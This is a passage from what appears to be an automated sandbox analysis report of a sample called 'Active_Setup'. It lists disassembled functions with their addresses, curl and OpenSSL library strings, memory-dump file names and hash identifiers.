                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Fputc$H_prolog3_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2569218679-3916222277
                                                                                                                                                  • Opcode ID: 031924af379c854d58f4ae3709971d9417377ddd6f7ea7f7c5c6d9ad77d7dedb
                                                                                                                                                  • Instruction ID: 0b38aba622bfd35c8d3e09cb6d3003fcb0a82e4d4ac5c714255af932ae59392a
                                                                                                                                                  • Opcode Fuzzy Hash: 031924af379c854d58f4ae3709971d9417377ddd6f7ea7f7c5c6d9ad77d7dedb
                                                                                                                                                  • Instruction Fuzzy Hash: F6519572A00609DFCF15DBA4DCA0DEEB7F5AFD8320F144519E592AB290EB70A904DB50
                                                                                                                                                  Function 00FD1400 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,0000000B,%x%s,00000000,010A2238), ref: 00FD1537
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                                  • String ID: %x%s$operation aborted by callback$read function returned funny value
                                                                                                                                                  • API String ID: 1809024409-2689952269
                                                                                                                                                  • Opcode ID: 7076d9725b4814e157d7a23a195daba85187611c18b0e3227fa6ccc119297000
                                                                                                                                                  • Instruction ID: 98ce760a886cc48c07cb23749f9cad6ec60da932fc2a9a5587eb190d36002457
                                                                                                                                                  • Opcode Fuzzy Hash: 7076d9725b4814e157d7a23a195daba85187611c18b0e3227fa6ccc119297000
                                                                                                                                                  • Instruction Fuzzy Hash: 91414D31A00305AFD310DF28EC45BEBB3E5FF99720F88451EE59947340E779A9088792
                                                                                                                                                  Function 00FB8140 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Added %s:%d:%s to DNS cache, xrefs: 00FB82A2
                                                                                                                                                  • %255[^:]:%d:%255s, xrefs: 00FB81BB
                                                                                                                                                  • Resolve %s found illegal!, xrefs: 00FB81F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _swscanf
                                                                                                                                                  • String ID: %255[^:]:%d:%255s$Added %s:%d:%s to DNS cache$Resolve %s found illegal!
                                                                                                                                                  • API String ID: 2748852333-825801415
                                                                                                                                                  • Opcode ID: 3ba8aae1f039843305c1e49389fb28c7a4c7fd517a11ebc7c2e255f3df24eb32
                                                                                                                                                  • Instruction ID: 916077f3fea93be78f8636034e0337fe2b9d4ace86cb953207a556e6ef2c4236
                                                                                                                                                  • Opcode Fuzzy Hash: 3ba8aae1f039843305c1e49389fb28c7a4c7fd517a11ebc7c2e255f3df24eb32
                                                                                                                                                  • Instruction Fuzzy Hash: 654103B28047425BC721EA15DC42FEB73E8AFD5394F14491DF98547201EA39E90ADBA2
                                                                                                                                                  Function 01052811 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _sprintf
                                                                                                                                                  • String ID: %s.dll$.\crypto\dso\dso_win32.c
                                                                                                                                                  • API String ID: 1467051239-517341328
                                                                                                                                                  • Opcode ID: 245e1a78370ce97b427137d9b5645d595c5afb5ae2e68667cacda8a2c39d0124
                                                                                                                                                  • Instruction ID: 01d465793b1f3701b78934282fc0be5e7ad7a95c4a8b15675c847c86dc2a6388
                                                                                                                                                  • Opcode Fuzzy Hash: 245e1a78370ce97b427137d9b5645d595c5afb5ae2e68667cacda8a2c39d0124
                                                                                                                                                  • Instruction Fuzzy Hash: 62218E77B8031267DB51969DDC82F9773D49FA2B51F0C00B4FEC0EF201E7A0A41492A2
                                                                                                                                                  Function 00FEECE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                  • API String ID: 2102423945-294840303
                                                                                                                                                  • Opcode ID: a19e1e605443f8cc0e0dddd07d9a92ff9026ed403daec4f3e5aee453307262d2
                                                                                                                                                  • Instruction ID: dc998416f563cde745bb9eb1940823a8cf9fe2414125694b495d419542ae213a
                                                                                                                                                  • Opcode Fuzzy Hash: a19e1e605443f8cc0e0dddd07d9a92ff9026ed403daec4f3e5aee453307262d2
                                                                                                                                                  • Instruction Fuzzy Hash: A321FCB2B803117BD6106A6DFC82B96F399DB94F60F048535F65CEB7C1E2B4AC1582D0
                                                                                                                                                  Function 010522D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 0105230A
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 010523B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$FreeLoad
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$filename(
                                                                                                                                                  • API String ID: 534179979-1090210371
                                                                                                                                                  • Opcode ID: c576b67fd58924b8ec6436e59f24b4e634b3e2351bcf6ad7bf44e353ed13ea8b
                                                                                                                                                  • Instruction ID: a80d6e40f3b8668122dc784d3d640fc30df1deff21424442547e94a68751b167
                                                                                                                                                  • Opcode Fuzzy Hash: c576b67fd58924b8ec6436e59f24b4e634b3e2351bcf6ad7bf44e353ed13ea8b
                                                                                                                                                  • Instruction Fuzzy Hash: 61212CB6BC030176E37039A56C47F5736894B50FA1F084076FF88AD2C3EAE5900451E5
                                                                                                                                                  Function 010475C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _getenv
                                                                                                                                                  • String ID: ENV$default
                                                                                                                                                  • API String ID: 3834326495-1320007843
                                                                                                                                                  • Opcode ID: 6c5ba34abd1c6c094a9986d34761cd3165354b820abc9510f5b7d25d98438ff5
                                                                                                                                                  • Instruction ID: cf441c1976374194abdcf9c39650e594b10e1b58284cb2e0395c6c9916cea0d4
                                                                                                                                                  • Opcode Fuzzy Hash: 6c5ba34abd1c6c094a9986d34761cd3165354b820abc9510f5b7d25d98438ff5
                                                                                                                                                  • Instruction Fuzzy Hash: FC21D7B26082015BD611DE7CACC0A7BBBD6AE94558F4845B9EDC4CB212E712D50DC2D2
                                                                                                                                                  Function 00FDC4D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                  • API String ID: 0-565200744
                                                                                                                                                  • Opcode ID: 71af75dd33bef2bd78c96bd24453f8251a2b8706932af9eec9ef54b4190c78e6
                                                                                                                                                  • Instruction ID: 8c63f27233a6fd2232c10c3d56a978f99182281b0532603b444c06012b5105b9
                                                                                                                                                  • Opcode Fuzzy Hash: 71af75dd33bef2bd78c96bd24453f8251a2b8706932af9eec9ef54b4190c78e6
                                                                                                                                                  • Instruction Fuzzy Hash: 1511B9B1FC0305BAFA303A55AC47F567552BB61F25F890019F6C82D2C3D5F71590D2A2
                                                                                                                                                  Function 00FB4C20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • finalized the digest!, xrefs: 00FB4C39
                                                                                                                                                  • MD5::hex_digest: Can't get digest if you haven't , xrefs: 00FB4C3F
                                                                                                                                                  • %02x, xrefs: 00FB4CC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _sprintf
                                                                                                                                                  • String ID: %02x$MD5::hex_digest: Can't get digest if you haven't $finalized the digest!
                                                                                                                                                  • API String ID: 1467051239-1020120221
                                                                                                                                                  • Opcode ID: f7fd73026229fef039e7cc749a771f85743498e0ca48228e7244a3971214b4f8
                                                                                                                                                  • Instruction ID: bfe3ed52cbe2e97e8169af16db98822d71fcfac5eb6e0f359d7fa12ba0670175
                                                                                                                                                  • Opcode Fuzzy Hash: f7fd73026229fef039e7cc749a771f85743498e0ca48228e7244a3971214b4f8
                                                                                                                                                  • Instruction Fuzzy Hash: 3C113DB1F001545BD710A66ADC45FA63B949B95B28F19016CF589CF383E676EC068790
                                                                                                                                                  Function 00FC8EC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SSL_write() return error %d, xrefs: 00FC8F7D
                                                                                                                                                  • SSL_write() error: %s, xrefs: 00FC8F6C
                                                                                                                                                  • SSL_write() returned SYSCALL, errno = %d, xrefs: 00FC8F52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: SSL_write() error: %s$SSL_write() return error %d$SSL_write() returned SYSCALL, errno = %d
                                                                                                                                                  • API String ID: 0-1841518057
                                                                                                                                                  • Opcode ID: 257e0fa1f8e998f6ac321f23e1a6a6ae856114fa41fe3696a1711c4eccb1fdc6
                                                                                                                                                  • Instruction ID: 3a9fe6e3b12f58b5cd58ad853e1c6e68f982017ec65328081ad215545a05c60f
                                                                                                                                                  • Opcode Fuzzy Hash: 257e0fa1f8e998f6ac321f23e1a6a6ae856114fa41fe3696a1711c4eccb1fdc6
                                                                                                                                                  • Instruction Fuzzy Hash: 29210371504246ABE320EB64DC42FBB739AFF84360F64461DF95487242DF35A814DBA2
                                                                                                                                                  Function 01016EE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv__aulldvrm__aullrem
                                                                                                                                                  • String ID: %.14s.%03dZ
                                                                                                                                                  • API String ID: 1415644573-1077646249
                                                                                                                                                  • Opcode ID: 56bd540ac7257e70478fef8315dd458273becd480727a273f4a34b59942a5c5b
                                                                                                                                                  • Instruction ID: bf5be8146cd09fa444e9ea291f7fc4bee8f0e8092045e45691e0af4940b5b62f
                                                                                                                                                  • Opcode Fuzzy Hash: 56bd540ac7257e70478fef8315dd458273becd480727a273f4a34b59942a5c5b
                                                                                                                                                  • Instruction Fuzzy Hash: AC11C6716453443BE214FB61CC82FAF73DCEF55B44F400418F6846A181DA79EA0057EA
                                                                                                                                                  Function 00FC12F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: 3'$Recv failure: %s
                                                                                                                                                  • API String ID: 2514157807-3205223812
                                                                                                                                                  • Opcode ID: dfe31e05dcdda7064b95b5153cf0b6c29900c5e724c8ac9d77d88a27bad36920
                                                                                                                                                  • Instruction ID: f33419e31cee616a17a88a8d042fc414664eee727feb5f595484f07b21540366
                                                                                                                                                  • Opcode Fuzzy Hash: dfe31e05dcdda7064b95b5153cf0b6c29900c5e724c8ac9d77d88a27bad36920
                                                                                                                                                  • Instruction Fuzzy Hash: 8101BCB52043056FC7209B18EC85F9AB7E8FBC9322F00845AF984C7281C63AA8108B61
                                                                                                                                                  Function 010915CF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ___BuildCatchObject.LIBCMT ref: 010915E2
                                                                                                                                                    • Part of subcall function 0109153D: ___BuildCatchObjectHelper.LIBCMT ref: 01091573
                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 010915F9
                                                                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 01091607
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
